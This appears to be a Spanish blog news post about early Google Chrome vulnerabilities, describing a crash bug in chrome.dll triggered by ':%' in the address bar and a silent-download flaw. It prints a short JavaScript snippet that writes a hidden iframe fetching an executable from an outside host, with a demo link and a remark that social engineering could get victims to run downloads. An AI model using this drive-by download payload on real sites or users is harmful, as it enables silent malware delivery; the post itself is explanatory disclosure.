Más bugs en Google Chrome.

Hola:

Parece que “algunos” la han tomado con el reciente y jovén navegador Google Chrome.

A pocos días de su lanzamiento ya se han encontrado dos vulnerabilidades más que hacen inseguro al navegador de Google.

Pasemos a comentarlas.

La primera vulnerabilidad descubierta, a pocas horas de su lanzamiento, ya la hemos comentado en la noticia anterior, que podéis acceder a ella desde aquí.

La segunda vulnerabilidad provoca el bloqueo TOTAL del navegador, haciendo que sea imposible seguir navegando con Google Chrome. Lo más sorprendente de todo es que Google Chrome maneja cada pestaña de forma individual… para evitar casos como este…

Esta vulnerabilidad fue descubierta hace unos días por Rishi Narang. El fallo radica en la librería chrome.dll (versión 0.2.149.27) del navegador que permite bloquear todas las pestañas del Google Chrome mostrando el mensaje “!Vaya¡ Google Chrome ha fallado. ¿Deseas reiniciar?” con solo visitar un enlace en una pagina mal intencionada, pasando por alto la aclamada funcionalidad de “pestañas independientes” de este navegador.

En evilfingers.com podemos encuentrar la Prueba de Concepto para que podamos verificar el fallo de seguridad (Click aquí o simplemente escribiendo “:%”, sin comillas, en la barra de direcciones “Omnibox“) y la explicación técnica del fallo.

La tercera y última vulnerabilidad encontrada hasta la fecha provoca que Google Chrome descargue cualquier tipo de fichero sin previo aviso.

Esta vulnerabilidad descubierta por nerex y publicado en milw0rm.com consiste simplemente en escribir el siguiente código JavaScript en un sitio malicioso y automáticamente al visitar este sitio se descargara la aplicación mencionada.

<script>
document.write(‘<iframe src=”http://www.netting.es/Chrome/calc.exe&#8221; frameborder=”0″ width=”0″ height=”0″>’);
</script>

http://www.netting.es/chrome/index.html

Si utilizais Google Chrome y visitáis el link de arriba “malicioso”, Google Chrome descargará un fichero llamado “Actualización.bat” sin previo aviso.

Si ejecutáis el fichero creará una carpeta en C:\ y dentro de esta un fichero de texto…

Es cierto que el fichero no se ejecuta solo. Pero con un poco de ingeniería social se podría conseguir ejecutarlo…

Un saludo.

Publicado en Noticias
One comment on “Más bugs en Google Chrome.
  1. Rusel dice:

    ah chrome chrome me quedo con firefox

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: